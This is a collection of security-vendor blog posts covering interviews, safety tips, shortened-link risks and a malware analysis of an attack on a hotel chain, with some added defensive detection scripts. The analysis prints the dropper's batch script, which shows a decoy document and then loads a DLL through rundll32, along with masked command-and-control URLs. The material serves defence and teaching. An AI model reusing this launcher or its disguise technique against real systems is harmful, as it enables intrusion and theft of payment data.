
“Complete security does not exist in any part of life and definitely does not exist on the Internet”

Ten years ago we started celebrating World Information Society Day on May 17th. On this day, we honor the Information Society and the importance of telecommunications by raising awareness about the Internet and its possibilities, as well as other information and communication technologies (ICT). Luis Corrons, technical director of PandaLabs, pointed out some of the Internet’s capabilities for society and business, and gave us some information on how we can reduce the digital divide.

 

Panda Security– The majority of traditional media outlets are already on the Internet. What advice do you have for them regarding computer security?

 

Luis Corrons– The Internet is a communication tool. Online media sites do not differ much from other websites, so really, the security measures are similar to those of any website belonging to a company in another sector. What they need are reliable systems that provide availability and are fast, but also take safety measures to protect them against possible server attacks. Also, businesses must be extra careful with personal information belonging to their users and/or subscribers.

 

PS– Social Networks are the main catalyst for change when it comes to the way we communicate, also affecting the personal world of an individual. Are privacy and cyber-security connected?

 

LC– No, privacy and cyber-security go hand in hand. Social networks and privacy are connected, because they encourage that we abandon our privacy by asking us to share personal information that would have never been public prior to their existence.

There are always those who violate the law by taking advantage of the Internet’s benefits.

 

PS– Internet Day celebrates everyone’s digital freedom: we can decide what to do in a digital environment, how to do it, and to whom. Is this a way for cyber-criminals to intervene?

 

LC– This is similar to the freedom we have walking through the streets of a city. But we are not going to prohibit walking down the street, or allocate pedestrian licenses, or make people check in on every corner so that the authorities know where they are at all times. It is clear that in a free environment there are always those who violate the law by taking advantage of the benefits, like those on the Internet, but we cannot let that be an excuse.

 

PS– The use of the Internet is increasingly widespread. One of the best examples is the number of mobile phones in our country. Do you think we should remind users that their security is in constant danger when browsing the Internet, or do you think that many times it is an exaggeration?

 

LC– Complete security does not exist in any part of life and definitely does not exist on the Internet. But we must not be paranoid. Just as we know that when driving a vehicle the probability of an accident is lower if we follow the rules, we can be reasonably safe if we have taken appropriate measures prior to surfing the web: have software updated and use a dependable security solution for all devices like computers, tablets and Smartphones.

 

PS– Internet is linked to technology. It is connected to TVs, online videos, the Internet of Things… do we communicate better or worse thanks to these technological developments?

 

LC– We communicate easier. Never in the history of mankind have we enjoyed so many options like the ones at our disposal today. With those options we can communicate better or worse… it is debatable. It can be said that there are people who are very faithful to the online world, and are much more isolated from the real world than they would be without the Internet. Do we communicate worse or better? It depends on each person.

 

If security is not present during a company’s digital transformation, it can ruin them.

 

PS– Digital transformation is a mandatory process for companies. What guidelines must be followed to complete this process safely?

 

LC– For those companies who have not already adopted digital transformation, it is probably too late. In any case it is essential that we take into account a company’s security when undertaking a digital project. We can have the best idea in the world, run the project perfectly, and make it a great success, but if security is not present our businesses will sink. Let us remember the damage that was suffered by companies from these types of attacks. Last year, the website Ashley Madison and the Italian company Hacking Team are clear examples of the damage these cyber-attacks can have.

 

PS– “Cloud” services group customer information into a network of specific servers. Do you need extra security to protect them?

 

LC– The fact is, for both the user and for the business, using cloud services actually decreases the work we have to do to protect the information. As much as a company wants to protect their users’ information, who is going to be able to devote more resources to do so than companies like Google or Microsoft? From this point of view it is clear that the information is more secure in the Cloud. However, there are other risks that we cannot forget: if someone were to steal one’s identity they would have access to those services that can be accessed remotely.

 

Remembering to update, protect and distrust are key for navigating the web safely.

 

PS– What minimum precautions should a user take for a safe experience?

 

LC– There are some guidelines that apply to all devices (computers, tablets, Smartphones):

  • Update: always have applications and the operating system updated, in order to patch any known security holes.
  • Protect: Use a security solution to protect us from the millions of attacks that occur on a daily basis.
  • Distrust: Many times, the users themselves cause security problems. We are very confident when we are on the Internet, and cyber-criminals take advantage of this by using the so-called “social engineering techniques”, where they trick us and infect our companies.

 

PS– Technology and cyber-security: what do we see for them in the future?

 

LC– A lot. The Internet of Things is going to fundamentally change the world of cyber-security, with more devices that need protecting every day, from domestic appliances to vehicles, all of them connected to the Internet. The greatest risk is that many of these newly connected devices were designed without taking into account that they would be connected to the Internet one day. Their manufacturers do not make security a priority. Just imagine that someone “kidnapped” your house using ransomware and does not allow you to leave or enter the house until the ransom is paid. Although this seems like science fiction, we must be well prepared for what lies ahead.

The post “Complete security does not exist in any part of life and definitely does not exist on the Internet” appeared first on Panda Security Mediacenter.

New feature in Avast Passwords for Android: Fingerprint scanning


Avast Passwords gives you easy, secure access to all your passwords, PINs and login credentials.

 

Avast Passwords is an app that helps you to safely store each of your PIN codes, passwords and login details safely in one place. Instead of needing to memorize each of your login credentials, Avast Passwords allows you to keep them together in one secure place and access them safely.

Eight everyday security tips for the whole family


From the youngest to the oldest in your household, every member of the family uses the Internet and apps to inform, entertain and maintain contact with their loved ones. This Sunday, May 15th, is International Day of Families and to celebrate, here are some basic tips to keep your family safe while navigating the web.

Updates

Make sure that your operating system and programs or applications are updated properly. Manufacturers often fix vulnerabilities that are appearing, but the only way to make sure your software is “patched-up” is by using the latest version.

Email Attachments

If you get an email that looks suspicious, do not open it until you are sure that the sender is who he claims to be. If you receive unknown messages, do not download the attachments! Even those documents that appear harmless (such as a Word or a spreadsheet) can hide malware. A simple photo might not be what it seems.

Public Wi-Fi

Avoid connecting to public Wi-Fi networks. Any cyber-criminal could use the network as a trap to access your device and steal your information. If you must use a public network, you should follow these basic security tips.

Online Shopping

While searching for the “best deals” online, we can end up on some unreliable and unknown websites. Stay away from them! Always verify that the website address matches the website you are trying to access and that it starts with “https”. If you always buy on reputable websites you will avoid greater evils.

Social Networks

Do not accept friend requests from strangers or allow your children to do so. Try not to share your personal data (like your phone number or address) across platforms like Facebook, Twitter or Instagram, because you can never be certain who is on the other side or spying on your conversations. It’s better to be safe than sorry.

Anti-virus

A good anti-virus is the best barrier that you can put between your computer and possible cyber-attackers. Each day, new vulnerabilities are discovered. Only the security experts are aware of them and can update the protection measures when there is a threat.

Parental Control

There are always threats on the network targeted towards young internet users. Educate the children in your family about proper internet usage and how to recognize unusual behavior. Teach them what they should do in difficult situations and always install a good parental control system, like Panda solutions.

Keep Them Little

It is normal, if not inevitable, that your children use social networks or messaging programs like WhatsApp, Snapchat, and Facebook Messenger to speak with their friends. These services can be beneficial or entertaining, but are not 100% danger-free. Beware of cyber-bullying and the dangerous strangers that lurk behind the disguise of a screen name. And for those older members of your family, you should educate them about the dangers of sexting.

 

The post Eight everyday security tips for the whole family appeared first on Panda Security Mediacenter.

The Best Free Tools for your PC


From fashion and flights to technology and innovation, we love to get a good deal.  We get a thrill out of saving money, and it’s even better when it’s free.

There’s a world of freedoms, thanks to popular software and licenses that are offered for free, depending on what interests you. Whether you are a photo-fanatic, music-junkie, or just love a good deal, there are tons of resources at your disposal. There is even software that turns your phone into a digital wallet, in case you want to go wallet-less!

The Down Low on the free Downloads

You can perfect and share a multitude of photos using free photo editing software. One of those freebies, PhotoScape, allows us to retouch and perfect all of our digital images in just a couple clicks. Once they’re fixed up, go ahead and share them on your favorite Social Network.

Because of their accessibility, we have become over-consumers of music, TV and movies. We want to use them whenever we want. You can organize and play all of your media using VLC media player, a free and open-source multimedia player that is available for different operating systems in several versions. You are able to watch movies and TV shows, and listen to music. It can be downloaded in the following formats: OGG, FLAC, MKV, MP3, MP4, WMV, MOV.

But, even freebies have imperfections. Companies have been battling to be the internet’s “most downloaded”, as seen with Google Chrome and Internet Explorer’s back and forth battle. Explorer was recently dethroned as the most-used browser. Regardless of who is in first place, both of these web browsers continue to trail the rest, like Firefox and Safari.

Take care of your PC on a low-cost budget

If we want to take advantage of these tools we must make sure our PCs are running at optimal levels. The free software CCleaner helps us delete useless files, while keeping our PCs clean, optimizing it, and speeding it up!

What about cyber-security? Let’s not forget that hackers take advantage of large security holes in order to attack Internet users. To protect ourselves from the 227,000 new malware samples that have been detected each day this year, we have free solutions like Panda Free Antivirus 2016, a great value with Panda’s guarantee. Quality isn’t always costly!

Who said it was expensive to keep your system up-to-date?

The post The Best Free Tools for your PC appeared first on Panda Security Mediacenter.

The danger of shortened links: exposed personal information

Microblogging gives us the freedom to turn our thoughts or our status posts into conversations. Social networks like Twitter have opened doors for this type of instant communication. Even shorter than Twitter’s 140 characters is bit.ly, an insanely popular platform for shrinking long URLs. But as always, with Bitly’s effectiveness and convenience come great security risks.

Most of us are aware that these shortened links have the possibility of being dangerous because… we don’t really know what is behind “the link”. All we see is a condensed URL (unless we click it). We need to use a special service to see the original URL before “clicking” it. Browser extensions like Mozilla Firefox’s Unshorten.it or Google Chrome’s LongURL were created to make this process easier.

 

Relying on shortened links can be dangerous

 

A recent study published by a group of researchers from the School of Technology at Cornell University in New York has demonstrated that the danger doesn’t only exist in the links themselves, but also, where-in-the-internet they might take you.  There also exists a possible threat to your private information stored in files on the Cloud. The bad guys have gained access to thousands of files in OneDrive, Google Drive and Google Maps from these shortened links.

 

The problem is that these reduced URLs are not only short but also very predictable. They all follow the same structure. It is extremely easy to generate hundreds or thousands of possible variants automatically, in a matter of seconds, and check whether each one leads to a file in the cloud.

 

 

When links fall into the wrong hands

 

“OneDrive URLs have predictable structure.  From the URL to a single shared document (“seed”), one can construct the root URL and automatically traverse the account”, as explained in the study. Following this procedure, researchers have gained access to nearly a million and a half files, “including hundreds of thousands of PDFs and Word documents, spreadsheets, multimedia and executables”.

 

Once the appropriate links are discovered, an attacker could not only access sensitive information contained in the files, but they could also take advantage of the Cloud so they can infect devices like mobiles and desktops. “This means that anyone who randomly scans bit.ly URLs will find thousands of unlocked OneDrive folders and can modify existing files in them or upload arbitrary content, potentially including malware.” This way of distributing malware is worrisome because it is both quick and effective.
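To show why such short tokens are guessable, the following added example (not part of the original post or the study) audits text such as an exported mailbox or wiki page for shortened links whose token space is small, and generates an unguessable replacement token. The shortener host list (apart from bit.ly), the 62-character alphabet and the 100-bit policy floor are assumptions.

```python
import math
import re
import secrets
from urllib.parse import urlparse

# Assumption: shortener hosts to audit. bit.ly is named in the article; the
# others are added for illustration and should match the services you use.
SHORTENER_HOSTS = {"bit.ly", "1drv.ms", "goo.gl"}
ALPHABET_SIZE = 62   # assumption: tokens are drawn from [A-Za-z0-9]
MIN_BITS = 100       # assumption: policy floor for an unguessable share link

URL_RE = re.compile(r"https?://[^\s\"'<>)]+")


def token_bits(token: str) -> float:
    """Upper bound on the entropy of a token of this length, in bits."""
    return len(token) * math.log2(ALPHABET_SIZE)


def audit_short_links(text: str, min_bits: float = MIN_BITS) -> list:
    """Return one finding per shortened link whose token is too small to
    resist systematic guessing."""
    findings = []
    for raw in URL_RE.findall(text):
        url = raw.rstrip(".,;")
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        if host not in SHORTENER_HOSTS:
            continue
        token = parsed.path.strip("/").split("/")[-1]
        if not token:
            continue
        bits = token_bits(token)
        if bits < min_bits:
            findings.append({
                "url": url,
                "token": token,
                "bits": bits,
                "keyspace": ALPHABET_SIZE ** len(token),
            })
    return findings


def new_share_token(nbytes: int = 16) -> str:
    """A share token with nbytes*8 bits of randomness from the OS CSPRNG."""
    return secrets.token_urlsafe(nbytes)


if __name__ == "__main__":
    # Constructed sample text; the tokens are made up.
    sample = ("Slides: https://bit.ly/1AbCdE, "
              "minutes: https://example.com/docs/abc")
    for finding in audit_short_links(sample):
        print(f"{finding['url']}: {finding['bits']:.1f} bits, "
              f"{finding['keyspace']:,} possible tokens")
    print("replacement token:", new_share_token())
```

A flagged link is only as private as its token: treat the file behind it as public, and re-share it with an access-controlled link or a long random token.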

 

The post The danger of shortened links: exposed personal information appeared first on Panda Security Mediacenter.

Panda Security named Company of the Year at the 5th Annual “Premios Nacionales El Suplemento”

Panda Security has been awarded Company of the Year at the 5th Annual “Premios Nacionales El Suplemento”.

Organized by the Spanish newspaper El Suplemento by ABC, at the “Premios Nacionales El Suplemento” well-deserved recognition is given to outstanding businesses and their hardworking professionals, who, despite the current economy, are boosting their efforts to be better leaders, step up and grow, on a daily basis.

The gala honored 34 winners, with one winner in each category. Panda Security was awarded the night’s most coveted prize: Company of the Year. The company joined a group of exceptional winners—highlighting important professionals and Spanish companies, or businesses with headquarters in Spain—who have excelled in different sectors by their innovative work, growth, outreach, and history.

 


Center: Rosa Díaz, the General Director of Panda Security Spain, collected the award on behalf of the Bilbao-based, computer security company.

Although Panda Security is mostly known as an anti-virus software company, it has expanded its line of business to advanced cyber security technology. Rosa Díaz said that, thanks to Adaptive Defense 360, Panda is a pioneer in uniting EPP and EDR systems in the same solution.  The new security model is capable of monitoring, registering and categorizing all active processes on the system.

This year, some of the highlighted winners include Turkish Airlines in the “Airline” category, the NGO Messengers of Peace in “Solidarity”, and Kone for its work in “Sustainability”, among others.

Technological milestones deserve an award

Panda Security is one of the leading manufacturers of security software in the world. They are included in Truffle 100’s list of Top European Software Vendors.

Among its milestones in technology, the pioneer has also launched security systems with concepts like SaaS (Security as a Service), or the anti-virus that protects from the Cloud (Cloud Computing). Panda is also recognized as the first security service provider to offer daily updates of its signature database.

Panda Security also introduced the first automatic detection, analysis and classification of malware in real-time for systems. This is called “Collective Intelligence” and, together with patented technology that blocks unknown viruses, is the precursor of Panda’s new security model: Adaptive Defense.

It is our desire that these awards will encourage professionals and companies to continue their innovation, outreach and good practices.

 

Congratulations to all the winners!

The post Panda Security named Company of the Year at the 5th Annual “Premios Nacionales El Suplemento” appeared first on Panda Security Mediacenter.

Andromeda distributors craft new strategies for attacks

Most of the distribution channels of the popular botnet Andromeda (also known as Gamarue) have been discovered and analyzed by antivirus vendors. This has forced Andromeda’s distributors to come up with a new attack strategy to continue to drop Andromeda binaries onto PCs.

Meanwhile at the Andromeda headquarters…

Operator: “Captain, all of our distribution channels have been discovered!”

Captain: “Report the loss..”

Operator: “Email scams, exploit kits, everything is known to the public.”

Captain: “Operator, let’s start with plan N!”

Operator: “Roger that, captain”

Before we dive into Andromeda’s new tactic, I’d recommend you to read this article by fellow security researchers from Stormshield, which describes one of Andromeda’s most recent phishing campaigns. We have observed similar Andromeda email phishing campaigns. Most of the emails we have seen seem to be targeting Germans and Italians. However, these two target groups seem to be too clever to fall for the bait, as they are not the top infected users.

Some of the popular subject lines used to target Germans and Italians are “Your current bill” and “A nude photo of you has appeared on the Internet”.


Panda Security, the tested anti-virus

Be careful! Not all anti-virus systems are what they seem, and many are more hazardous than helpful for your cyber security, according to a recent investigation. The investigation concluded that, today, most anti-virus products tend to lower the threshold of Internet browser security. Can they protect us against external threats? How effective are they?

Traditionally, browsers incorporate tools to check certificates issued by websites to ensure that they have been issued by an appropriate entity. Panda Security’s products do not use interception techniques, like intrusive man-in-the-middle through TLS proxies, to analyze our customers’ communications. Our solutions are completely transparent and do not install any type of certificate for this function. Thanks to this we can avoid these types of vulnerabilities, while minimizing the impact on the communication performance for our users’ devices. For this reason, Panda solutions are not included in the study.

Panda Antivirus, the “nonvulnerable”

Panda’s products are mentioned as those not affected by this vulnerability in Concordia University’s report.

The affected anti-virus systems in the study trick browsers, causing them to relax and trust any certificate, even though they shouldn’t. On the contrary, Panda Security solutions appear in this report because of their transparency and reliability for users.

The post Panda Security, the tested anti-virus appeared first on Panda Security Mediacenter.

Advanced Attacks against Hotel Chains: A practical example

Recently, we published a report where we discussed the numerous attacks on major hotel chains. The attacks were directed mainly towards credit card theft. Attackers do this by infecting point-of-sale terminals in these types of establishments. A few days ago, one of our Adaptive Defense 360 clients, a luxury hotel chain, suffered an attack. I wanted to take advantage of this opportunity to show how cyber-criminals are entering company networks.

We know that, in most cases, these types of attacks are initiated through an email with an attached file that compromises the victim’s computer, or a link to a page that uses vulnerabilities to achieve the attacker’s objective. In our client’s case, the attack began with an email message addressed to a hotel employee stating the attachment provided all the information needed to pay for a hotel stay at the end of May 2016.

The message contained a zipped file attachment, which when opened contained a file with a Microsoft Word icon. When the file was executed, it showed the following:

[Screenshot: the document displayed to the victim, a hotel reservation form]

This is a hotel reservation form that is to be filled out by a customer. They wrote their payment information for a stay at the end of May 2016. As you can see, it does not appear unusual. In fact, this document is identical to those that this hotel employee sends to his customers (even the name is the same), but if we look closely, we will see that the file comes from a zip. Although it displays the Word icon, it is an executable file.
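The disguise described above can be caught at the mail gateway by inspecting what a zip member contains rather than how it is named. The following added example (not Panda's code or part of the original report) flags members that start with a Windows executable header or whose content does not match their document extension. The sample archive and its file names are constructed.

```python
import io
import zipfile

EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".cmd", ".bat", ".dll"}
# Leading bytes a genuine file of each document type starts with.
DOC_MAGIC = {
    ".docx": b"PK\x03\x04",        # Office Open XML is itself a zip
    ".xlsx": b"PK\x03\x04",
    ".pdf": b"%PDF",
    ".doc": b"\xd0\xcf\x11\xe0",   # OLE2 compound file
}


def inspect_member(name: str, head: bytes) -> list:
    """Return the reasons a zip member looks like a disguised executable."""
    lower = name.lower()
    ext = "." + lower.rsplit(".", 1)[-1] if "." in lower else ""
    reasons = []
    if head.startswith(b"MZ"):
        reasons.append("content is a Windows executable (MZ header)")
    if ext in EXECUTABLE_EXTS:
        reasons.append(f"executable extension {ext}")
    expected = DOC_MAGIC.get(ext)
    if expected and not head.startswith(expected):
        reasons.append(f"{ext} name but content does not match that format")
    return reasons


def scan_zip_attachment(data: bytes) -> dict:
    """Map each suspicious member name to the reasons it was flagged."""
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return {"<archive>": ["not a valid zip file"]}
    findings = {}
    with archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            if info.flag_bits & 0x1:
                # Password-protected members cannot be read for inspection.
                findings[info.filename] = ["encrypted member, cannot inspect"]
                continue
            with archive.open(info) as handle:
                head = handle.read(8)
            reasons = inspect_member(info.filename, head)
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_constructed_sample() -> bytes:
    """Constructed attachment: harmless bytes that only imitate file headers."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("reservation_form.exe", b"MZ\x90\x00" + b"\x00" * 60)
        archive.writestr("invoice.docx", b"MZ\x90\x00" + b"\x00" * 60)
        archive.writestr("notes.docx", b"PK\x03\x04" + b"\x00" * 26)
    return buf.getvalue()


if __name__ == "__main__":
    for member, reasons in scan_zip_attachment(build_constructed_sample()).items():
        print(member, "->", "; ".join(reasons))
```

The icon an executable displays is stored inside the file itself, so only the content and extension checks are reliable signals here.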

When you run it, three files are created on the disk and the first one runs:

– reader_sl.cmd

– ROCA.ING.docx

– adobeUpd.dll (MD5: A213E36D3869E626D4654BCE67F6760C)

The contents of the first file are shown below:

@echo off

start "" ROCA.ING.docx

Set xOS=x64

If "%PROCESSOR_ARCHITECTURE%"=="x86" If Not Defined PROCESSOR_ARCHITEW6432 Set xOS=x86

IF "%xOS%" == "x64" (start "" C:\Windows\SysWOW64\rundll32.exe adobeUpd.dll,Wenk)

IF "%xOS%" == "x86" (start "" C:\Windows\System32\rundll32.exe adobeUpd.dll,Wenk)

ping -n 12 localhost

As we can see, the first thing the script does is open the Word document, so that the victim sees the expected form and the trick is complete. Then, adobeUpd.dll runs with the parameter “Wenk”. While executing, it modifies the file, marking it as read-only and hidden, and creates an entry in the Windows registry that runs every time the computer is turned on.

It then contacts a specific URL:

http://www.************.ga/en/scripts/en.php?stream=lcc&user=iPmbzfAIRMFw

It then downloads a file that contains the user value given in the URL parameter (iPmbzfAIRMFw). In the event of a match, it attempts to download the file:

http://www.************.ga/en/scripts/iPmbzfAIRMFw.jpg

When we try to download it, it is not available; it will not be on our customer’s systems either, as we blocked the infection attempt and the malware was not able to run there. The domain in the URL has exactly the same name as our customer’s domain, except that the customer uses “.com” while the attackers registered the same name under Gabon’s top-level domain (“.ga”). This way, the similarity to the customer’s own domain name means the traffic won’t attract attention if the hotel’s security team sees it when analyzing network traffic.

In spite of the fact that the file iPmbzfAIRMFw.jpg is not available, if we look at the code of adobeUpd.dll we can see that it looks for a specific mark in this file, then decrypts the data that follows it and runs it as a PE (created as “Tempsystm”).
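The same-name, different-TLD trick described above is easy to hunt for in proxy logs. The following added example (not from the original report) flags requests to hosts whose name matches one of the organisation's own domains under another top-level domain, and counts requests per client to help spot the periodic check-ins. The domain examplehotel.com, the log format and the log lines are constructed placeholders, and the two-label split assumes single-label TLDs (suffixes such as co.uk need a public suffix list).

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Placeholder for the organisation's real domains (the article masks the real one).
OWN_DOMAINS = {"examplehotel.com"}


def split_name_tld(host: str):
    """Return (name, tld) from the last two labels, or None if there are fewer."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) < 2 or not all(labels):
        return None
    return labels[-2], labels[-1]


def tld_swap_of(host: str, own_domains=OWN_DOMAINS):
    """Return the own domain that `host` imitates under another TLD, if any."""
    parts = split_name_tld(host)
    if parts is None:
        return None
    name, tld = parts
    for own in own_domains:
        own_name, own_tld = split_name_tld(own)
        if name == own_name and tld != own_tld:
            return own
    return None


def find_lookalike_traffic(log_lines, own_domains=OWN_DOMAINS) -> dict:
    """Map each lookalike host to {client_ip: request_count}.

    Assumed log format (constructed): "<timestamp> <client_ip> <method> <url>".
    """
    hits = defaultdict(lambda: defaultdict(int))
    for line in log_lines:
        fields = line.split()
        if len(fields) < 4:
            continue  # skip malformed lines instead of failing the whole run
        client, url = fields[1], fields[3]
        host = urlsplit(url).hostname
        if host and tld_swap_of(host, own_domains):
            hits[host][client] += 1
    return {host: dict(clients) for host, clients in hits.items()}


# Constructed proxy log lines for the demonstration.
SAMPLE_LOG = [
    "2016-05-20T09:01:12Z 10.0.4.17 GET http://www.examplehotel.ga/en/scripts/en.php",
    "2016-05-20T09:02:40Z 10.0.4.22 GET http://www.examplehotel.com/booking",
    "2016-05-20T09:07:55Z 10.0.4.17 GET http://www.examplehotel.ga/en/scripts/en.php",
    "2016-05-20T09:08:03Z 10.0.4.22 GET http://www.example.org/",
    "truncated line",
]

if __name__ == "__main__":
    for host, clients in find_lookalike_traffic(SAMPLE_LOG).items():
        print(host, clients)
```

Registering the obvious TLD variants of your own domain defensively, or alerting when one is newly registered, closes the same gap earlier.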

Subsequently, adobeUpd.dll remains in a loop, randomly connecting every several minutes to:

http://www.************.ga/en/scripts/en.php?mode=OPR&uid=iPmbzfAIRMFw&type=YFm

As we see, this attack is specifically directed at this hotel chain. The criminals have already removed all traces of the server the malware connected to, and as we aborted the attack we can only speculate about what they were going to do next. In our experience, this type of attack seeks to compromise a computer in the victim’s company and then move laterally to reach its ultimate goal: the point-of-sale terminals that process the credit card payments, as we have seen in so many other cases.

Traditional anti-virus does not work against this type of attack, since these are threats created specifically for a victim, and the attackers always ensure that the malware is not detected by the signatures, proactive technologies, etc. that current anti-malware solutions have built in. That is why EDR (Endpoint Detection & Response) services equipped with advanced protection technology are vital for effective protection against these attacks.

The post Advanced Attacks against Hotel Chains: A practical example appeared first on Panda Security Mediacenter.

Android Banker Trojan preys on credit card information

An Android Trojan is spying on its victims and even tricking some into giving up their credit card information.

Most of today’s malware authors create malware for one of two reasons: either to make money or to steal valuable data. In this blog post, we will show how an Android Trojan relies on social engineering. Social engineering tactics are used to trick people into performing an action, like clicking on a link or downloading an application. The person being tricked thinks they are doing something innocent when they are really clicking on or downloading something malicious. This malware is associated with the banker family as it tries to steal user’s credit card information.

Once installed, the Banker Trojan puts an icon in the launcher. The app name shown with the icon can vary from sample to sample — some of the names we have seen were: AVITO-MMS, KupiVip and MMS Центр (MMS Center).